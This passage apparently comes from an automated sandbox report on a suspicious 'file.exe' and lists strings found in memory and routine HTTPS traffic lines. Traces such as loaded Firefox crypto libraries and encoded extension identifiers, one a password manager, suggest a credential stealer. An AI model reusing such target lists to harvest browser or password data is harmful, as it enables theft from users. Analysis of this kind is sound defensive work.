Source: chromecache_79.3.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_78.3.dr String found in binary or memory: https://plus.google.com
Source: chromecache_78.3.dr String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000001.00000002.1930076715.00004A3000A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000001.00000002.1923617263.00004A3000078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000001.00000002.1923617263.00004A3000078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingJ0
Source: chrome.exe, 00000001.00000002.1923944010.00004A30000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000001.00000002.1924926380.00004A30001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000001.00000002.1926601964.00004A30004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1931054285.00004A3000C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1928978060.00004A30007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1928937847.00004A300079C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000001.00000002.1926601964.00004A30004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1931054285.00004A3000C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1928978060.00004A30007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1928937847.00004A300079C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000001.00000002.1926279329.00004A300040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854611219.00004A30013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1855180976.00004A3001478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1858941483.00004A30014A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1855057282.00004A3001470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854730742.00004A30013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1857071896.00004A30013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1858893949.00004A30013C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854964503.00004A3001468000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: JKJDBAAAEHIEGCAKFHCGDHIEGD.0.dr String found in binary or memory: https://support.mozilla.org
Source: JKJDBAAAEHIEGCAKFHCGDHIEGD.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JKJDBAAAEHIEGCAKFHCGDHIEGD.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1924463775.000000001D29D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1924463775.000000001D29D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t
Source: chrome.exe, 00000001.00000002.1929905118.00004A30009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000001.00000002.1924926380.00004A30001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chromecache_78.3.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2097680594.00000000233C2000.00000004.00000020.00020000.00000000.sdmp, FIIIIDGHJEBFBGDHDGII.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1933398290.000000000126C000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1930562263.00004A3000B5C000.00000004.00000800.00020000.00000000.sdmp, GIJDAFBK.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000001.00000003.1859150086.00004A3000BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1832796731.00004A3000BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1914648687.00004A3000BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1930668423.00004A3000BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1837221454.00004A3000BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000001.00000003.1859150086.00004A3000BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1832796731.00004A3000BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1914648687.00004A3000BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1930668423.00004A3000BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1837221454.00004A3000BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000001.00000003.1859150086.00004A3000BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1832796731.00004A3000BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1914648687.00004A3000BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1930668423.00004A3000BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1837221454.00004A3000BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2097680594.00000000233C2000.00000004.00000020.00020000.00000000.sdmp, FIIIIDGHJEBFBGDHDGII.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: chrome.exe, 00000001.00000002.1929540481.00004A3000914000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000001.00000003.1833225737.00004A3000ED0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000001.00000002.1929020227.00004A30007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1930251923.00004A3000AC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000001.00000002.1931054285.00004A3000C50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000001.00000002.1924926380.00004A30001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000001.00000002.1924926380.00004A30001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promosJAx
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000001.00000002.1924926380.00004A30001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1932476861.00004A3000E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1929624729.00004A3000958000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1929188687.00004A3000850000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000001.00000002.1924926380.00004A30001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1932476861.00004A3000E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1929624729.00004A3000958000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1929188687.00004A3000850000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000001.00000003.1832939403.00004A3000DB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: file.exe, 00000000.00000003.1933398290.000000000126C000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1928413011.00004A3000744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1930562263.00004A3000B5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1927240534.00004A30005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1926785516.00004A30004EC000.00000004.00000800.00020000.00000000.sdmp, GIJDAFBK.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000001.00000002.1928413011.00004A3000744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000001.00000002.1930562263.00004A3000B5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoresent.
Source: chrome.exe, 00000001.00000002.1926279329.00004A300040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854611219.00004A30013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1855180976.00004A3001478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1858941483.00004A30014A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1855057282.00004A3001470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854730742.00004A30013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1857071896.00004A30013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1858893949.00004A30013C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854964503.00004A3001468000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 00000001.00000003.1854964503.00004A3001468000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000001.00000003.1837487832.00004A300120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000001.00000002.1926601964.00004A30004AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000001.00000002.1926601964.00004A30004AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submitJ0j
Source: chrome.exe, 00000001.00000002.1930038108.00004A3000A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000001.00000002.1923307296.00004A300001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chromecache_78.3.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_78.3.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000001.00000003.1864349407.00004A3001778000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1864406326.00004A300177C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1864730501.00004A300179C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1864547633.00004A3001784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1864484903.00004A3001780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1864602944.00004A3001788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1864875736.00004A30017B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1864779960.00004A30017A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1864673344.00004A300178C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1864836208.00004A30017A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000001.00000003.1859345929.00004A30014F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000001.00000003.1864730501.00004A300179C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerJ0
Source: chrome.exe, 00000001.00000002.1925121317.00004A300020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000001.00000002.1925121317.00004A300020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000001.00000002.1925121317.00004A300020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000001.00000002.1925121317.00004A300020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000001.00000002.1929540481.00004A3000914000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000001.00000002.1929540481.00004A3000914000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000001.00000002.1926601964.00004A30004AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000001.00000003.1858893949.00004A30013C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000001.00000002.1941561497.00004A3001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854611219.00004A30013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1855838649.00004A300140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1856966201.00004A3000F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1858941483.00004A30014A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854730742.00004A30013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1857071896.00004A30013AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1858893949.00004A30013C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000001.00000003.1858893949.00004A30013C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854964503.00004A3001468000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.JsvYdB1VlTQ.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000001.00000003.1858893949.00004A30013C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1854964503.00004A3001468000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.GZmhE2vV14w.L.W.O/m=qmd
Source: JKJDBAAAEHIEGCAKFHCGDHIEGD.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: JKJDBAAAEHIEGCAKFHCGDHIEGD.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: JKJDBAAAEHIEGCAKFHCGDHIEGD.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2042015562.000000002361D000.00000004.00000020.00020000.00000000.sdmp, JKJDBAAAEHIEGCAKFHCGDHIEGD.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: JKJDBAAAEHIEGCAKFHCGDHIEGD.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=us
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=usGF8aHBnbGZoZ2ZuaGJncGpk
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=usWFwa21ibGlvYnwxfDB8MHxM
Source: file.exe, 00000000.00000003.2042015562.000000002361D000.00000004.00000020.00020000.00000000.sdmp, JKJDBAAAEHIEGCAKFHCGDHIEGD.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chrome.exe, 00000001.00000002.1928092777.00004A30006E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000001.00000002.1928092777.00004A30006E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000001.00000002.1928092777.00004A30006E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000001.00000002.1928092777.00004A30006E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000002.1925666200.00004A30002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
